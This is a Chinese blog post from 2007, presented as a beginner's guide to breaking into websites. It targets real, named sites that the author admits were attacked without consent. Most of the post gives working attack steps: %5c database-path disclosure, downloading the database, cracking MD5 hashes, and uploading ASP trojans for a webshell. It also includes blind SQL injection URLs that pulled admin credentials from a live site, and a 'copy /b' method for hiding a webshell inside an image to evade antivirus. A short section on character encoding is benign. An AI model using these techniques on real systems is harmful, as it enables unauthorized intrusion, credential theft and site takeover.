菜鸟入侵网站实例讲解[精~~~]


   本文主要是以实际操作、演练为主!
   以供和我一样的菜鸟们学习。
   本教程所涉及的有漏洞的网站都是实际检测到的!
  而且也未征的网站管理员同意.
  同时希望大家不要利用本教程做有损这些网站的事情!
   后果自负!。


   首先大家请打开IE浏览器

然后点上面的 “工具菜单” 再选择 "IETERNET 选项"  选择 "高级"

把里面的那个 "http错误友好提示" 前的勾给去了(这一步很重要!)

然后在地址栏里输入 http://www.qd65.qdedu.net/teacher/maths/index2.asp

在主页上随便选择一个新闻。点击进去~~~这里我们选择 数学组教研信息 http://www.qd65.qdedu.net/teacher/maths/ShowArticle.asp?ArticleID=163

然后我们在地址后面加个小小的斜杠 "/ "

也就是在地址栏里
输入 http://www.qd65.qdedu.net/teacher/maths/ShowArticle.asp?ArticleID=163/
然后 你就会看到这样的提示:

类型不匹配: 'Clng'

/teacher/maths/Inc/syscode.asp

然后我们复制后面的 teacher/maths/Inc/syscode.asp加到http://www.qd65.qdedu.net后面`~~

也就是在地址栏里输入 http://www.qd65.qdedu.net/teacher/maths/Inc/syscode.asp

然后大家就会看到这样的提示

'D:\web\teacher\maths\Inc\database\maths.asp'不是一个有效的路径。 确定路径名称拼写是否正确,以及是否连接到文件存放的服务器

看到没有~~~~数据库真实地址暴露出来了`~~~

http://www.qd65.qdedu.net\teacher\maths\database\maths.asp

就是数据库地址~~~不过数据库的后缀是MDB 这里改为ASP了`~~~在一段时间里~~~这个方法很流行`~~据说可以防止数据库被下载~~~

但是我们把上面的地址复制到迅雷里~~~就可以下载了

下载后~~~我们把文件后缀改为mdb就可以了`~~

然后打开 (当然,前提是你的机器上装了微软办公软件officee中的accsee 数据库软件。如果没有可以去下载个辅臣数据库浏览器,或者直接安装ACCSEE数据库软件)

然后找到一个叫admin 的表`~~~打开~~~前面的那个 是后台管理员的用户名,后面的那个是经过MD5加密后的密码~~~

然后去网上下个MD5 解密器~~~~就可以破解了`~~这样你就是 管理员了; ~~~(有关MD5的知识,军团内有介绍!)

然后去后台 更改文件上传类型~~~~~加一个ASP

然后就上传 ASP木马`~~~手气好的话 就可以拿到 WEBSHELL 了~~~~

好了`~~~就到这里吧~~~~

 

 

今天还是以飞扬学院的新闻系统为例,说说这个曾经非常流行的%5C暴库入侵方法。

首先我们打开

飞扬就业网 http://www.feiyangcollege.com/jyw/index.asp

随便点开一个新闻 关于召开毕业典礼的通知

http://www.feiyangcollege.com/jyw/index_Article_Content.asp?fID_ArticleContent=70

然后在后面加一个 ' 于是地址是 http://www.feiyangcollege.com/jyw/index_Article_Content.asp?fID_ArticleContent=70'

提示说我提交非法参数~~~看样子 ' 被程序员屏蔽了 。看样子这样的办法行不通~~~


于是用一下%5c方法~~~

把最后那个/ 改为%5C。也就是http://www.feiyangcollege.com/jyw\index_Article_Content.asp?fID_ArticleContent=70
看看返回的提示是什么~~


Microsoft JET Database Engine 错误 '80004005'

找不到文件 'E:\www.feiyangcollege.com\database.mdb'。

/jyw\index_Article_Content.asp,行15

哈哈 ,数据库暴露了~~~~

于是输入地址 http://www.feiyangcollege.com/database.mdb

晕~~~竟然不存在 此数据库~~~

于是想了下.....................

哦~~~~~~~原来是这样`~~~(原因等下解释)

于是把地址改为http://www.feiyangcollege.com/jyw/database.mdb

哈哈。。。终于搞定~~~~

心想 怎么飞扬学院的人做程序连这点 都考虑不到啊 `~~~把数据库打开,一看表名以及结构`~~

晕~~~竟然 还是那个深度空间 www.deepteach.com 的程序~~~

想不到~~这么有名的程序 也存在这样的漏洞`~~~哈哈`~~~于是去试一下www.deepteach.com 这个网站 ,看看 结果如何。

晕~~~不行~~纳闷中.....................

于是在论坛上http://www.deepteach.com/Forum/dispbbs.asp?boardID=16&ID=290&page=1


再找一个运用了此系统的网站 黑龙江家电维修网http://www.hljjdwx.com/

还是 不行`~~~思考中.............

哦~~~原来 这招只能对付 系统在二级目录下 的程序~~~~

%5c的暴库需要的是二级目录,一级目录无法成功。如:
http://www.feiyang.com%5c1.asp?id=1 不成功
http://www.feiyang.com/other%5c1.asp?id=1 成功


好了,上面所说的只是给大家一个练习的机会~~~~

下面就转几个我收集的这方面的文章,里面有方法和原理。很全面的。(本想自己写的,但是太多了。并且已经有前辈写了,就在这里借用一下)

先转一个非常流行的一篇文章《再谈%5c暴库的利用》

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

关于%5c的暴库利用想已经不是什么新技术了,原因我只找到含糊的说法:\的UNICODE是%5c当提交时,IIS无法正常解析,导致暴库。但我对http://www.hoky.org测试成功后(现在已经补上)问过hoky.pro,得知%5c与IIS的设置是有关系的。而在默认设置下是可以暴库的。
还有很多人说不成功,我要说的三点:
1。一般的错误返回页面是本地IE提供的,所以我们先得关了本地的错误页面,具体在菜单项的‘工具->internet选项->高级->显示友好信息'。
2。对方数据库要是Access型。
3。%5c的暴库需要的是二级目录,一级目录无法成功。如:
http://www.sometips.com%5c1.asp?id=1 不成功
http://www.sometips.com/other%5c1.asp?id=1 成功

好了,上面说的大家都知道,当是废话。在暴库这么好用的东西下,如果一个网站只有一级目录的话,难道就没有办法了吗?
说到重点:
其实一级目录我们也同样可以成功的,我们可以通过构造一个多级目录来达到暴库的目的。
如下:
http://www.target.com/noexists/..%5clist.asp?id=1

这样大家就会有新的惊喜了,呵呵。

补救方法也很简单:
在conn.asp里 加入数据库文件的位置后面加上这句:
On Error Resume Next
就可以了。

 




 


SQL注入 是网站入侵中的精华~~~~正因为SQL注入技术 才使得 网站入侵成为 最优美的 黑客攻击 技术~~~

 

先转个教程 等会 找个网站 给大家演示下

 http://www.webjx.com/htmldata/2005-02-26/1109376430.html

http://joyo.i170.cn/Article/16040
先给个网站供大家练习~~

黑龙江家电维修网http://www.hljjdwx.com

这个网站,本人已经检测了。存在SQL漏洞,大家可以试验~~~

我过几天再 写个入侵过程 出来`~~~

大家 交流 一下 入侵经验

...........................................

再看看 浏览器编码方式~~~可以让你 成为SQL注入高手哦~

往往,文本信息的传递实际上通过了一下交换:读者--浏览器--web服务器--数据库服务器;后面的三者不一定都是采用utf-8编码的,特别是当传递汉字的时候。
下面一行可以指定给浏览器文档的编码:
meta http-equiv="Content-Type" content="text/html; charset=utf-8"
浏览器会根据meta值选择编码,它负责读者和浏览器的交互,浏览者可以强制改变编码方式;
同时在asp文件首行可以通过以下命令指定处理字符时候采用的编码:
@ codepage=936 简体中文
@ codepage=950 繁体中文
@ codepage=65001 UTF-8
为了避免乱码产生,最好和数据库以及html信息中指定的编码一致。
在mssql、mysql等数据库中,也含有编码的信息。

ServerXMLHTTP默认的CodePage是UTF8,URL和文件信息被先转换为UTF8编码,如果使用responseText属性,即xmlhttp通过http请求得到的返回的文本信息,如果不采用gb2312编码,即使所有编码一致,汉字也将无法正常显示(测试发现),所以一般使用responseBody,既返回文档的未经过解码的二进制信息,然后在经过编码转换来正确显示汉字。

..................................................

当数据流的源与目的地使用不同的字符编码时,就需要对字符编码进行正确的转换:

1. 处理HTTP请求数据编码

  默认情况下,IE浏览器发送请求时采用“ISO-8859-1”字符编码,如果Web应用程序要正确读取用户发送的中文数据,则需要进行编码转换。

  一种方法是在处理请求前,先设置HttpServletRequest对象的字符编码:

request.setCharacterEncoding("gb2312");

另一种方法是对用户输入的请求数据进行编码转换:

String clientData = request.getParameter("clientData");

if(clientData != null)

clientData = new String(clientData.getBytes("ISO-8859-1"),"GB2312");

2. 处理数据库数据编码

如果数据库系统的字符编码是“GB2312”,则可以直接读取数据库中的中文数据,无需要转换。如果数据库的字符编码为“ISO-8859-1”,则先对来自数据库的数据进行编码转换,然后才能使用。方法是

  new String(field.getBytes("ISO-8859-1"),"GB2312")

这里field为数据库表的某个字段值

=============================================
啊~~~~~~~终于把 那个“黑龙江家电维修网” 搞定了`~~

哈哈`~~还是个比较大的网站呢~~~

这就写个教程出来~~~45157486084

按照上面我给的连接人家给的教程一步一步来~~~

首先进行注入检测:输入http://www.hljjdwx.com

在其主页上随便找个文章

http://www.hljjdwx.com/shownews.asp?NewsID=446

然后改为~~

http://www.hljjdwx.com/shownews.asp?NewsID=446 and 1=2

晕~~竟然提示说“怎么回事老大,中国互联网你也来啊!找日本去!不然我会反攻的哦”

说的也是~~~不过。我可是不搞破坏哦`~~没关系~~~提高中国黑客的技术以及防范意识~~~~

好了废话不说了~~

看样子是空格给屏蔽了。于是把空格用+号代替~~~(这是编码问题,不懂可以查查资料)

还是不行~~~看样子and 也被过滤了`~~于是改为大写~~~AND

哈哈~~

错误 '80020009'

/shownews.asp,行 68

终于出错了`~~看样子能行~~~

好了注入检测就到此为止`~~下面开始进攻~~~

首先猜解数据库的管理员的表名

http://www.hljjdwx.com/shownews.asp?NewsID=446+AND+(SElECT+COUNT(*)+FROM+ADMIN)>=0

哈哈~~~正常显示~~~看样子表名猜解对了`~~~

于是猜解用户名字段的字段名

(这里,我先看看他的后台登陆处的变量名。是username 我试下。因为大多数程序员为了方便,大多将数据库的字段名与这个变量名设置成一样的。这样虽然易于设计程序`~但是对于黑客可是很大的方便哦)

http://www.hljjdwx.com/shownews.asp?NewsID=446+AND+(SELECT+COUNT(username)+FROM+ADMIN)>=0

哈哈`~~~成功`~~!!!

于是再猜测 字段~~

先猜测长度~~~

http://www.hljjdwx.com/shownews.asp?NewsID=446+AND+(SELECT+top+1+len(username)+FROM+ADMIN)>=0

http://www.hljjdwx.com/shownews.asp?NewsID=446+AND+(SELECT+top+1+len(username)+FROM+ADMIN)>=1

一个一个试~~~当然能才出来~~

但是我还没那么苯拉 于是用折中法

猜解出来为3~~~

再猜解单个单个字段直:

http://www.hljjdwx.com/shownews.asp?NewsID=446+AND+(SELECT+top+1+ASC(MID(username,1,1))+FROM+ADMIN)>=0

方法与上面一样~~~我猜解出来的3个为负的四位数~~~

这个花了我好多时间啊`~~

大家都知道因为ASCII码的直为1-125~~

但是这个负数是怎么回事情呢?

经过高人指点~~~原来是汉字`~~~于是把数字用

msgbox Chr(数字)

方法解码~~~

晕~~原来第一个是个 “风”字~~

再看看 他的前台新闻中`~~有个叫 “风雷电”的家伙发了不少文章

看样子 后面那两个字不用 猜解了`~~~

于是用相同方法猜解密码~~~~

哈哈`~~是11位的密码`~~~

把得到的数据~~~对照ASCII 再编码过来`~~

哈哈~~~是11个大写字母~~~

看样子没经过MD5加密(因为MD5加密后为16或者32位数据)

狂喜`~~

于是输入用户名 密码`~~~

晕~~~没用`~~

是不是密码猜解错误~~~~???

于是再猜解一次~~~~

没错啊`~~

想了N久~~~

哦~~~

原来不应该用ASCII解码~~~~

用上面的

msgbox Chr(数字)

方法~~~

哈哈`~~得到11位的数字~~~

于是............

终于进到后台了~~~



今天Fire Phoenix 说他 弄了一个网站的后台~~~~

于是我跟他要来后台密码~~~于是 更改上传类型~ 加了个ASP进去~~~

于是找到上传页面 上传了一个 站长助手~~~~但是我上传了好几次,竟然无法访问~~~于是上传再刷新一下 竟然文件不见了`~~

........于是我纳闷了N久~~~哦。。原来是 站长助手被服务器上的杀毒软件杀了。于是我想到用图片木马~~

由于我这人不太喜欢用工具,所以就没用网上的免杀ASP工具,于是~~~自已手动做免杀

工具:站长助手(这个当然需要拉~~代码那么长自己做不来啊) 2.asp

新建一个asp文件 内容是: 名为:1.asp

再建一个jpg或gif图片格式的文件 3.jpg

进DOS合并文件,如文件都有在C盘下 执行 copy /b 2.asp+1.jpg pig.jpg

生成pig.jpg文件

最后把1.asp和pig.jpg两个文件上传到肉鸡。

posted on 2007-01-22 12:42  老有所依  阅读(766)  评论(0)    收藏  举报

导航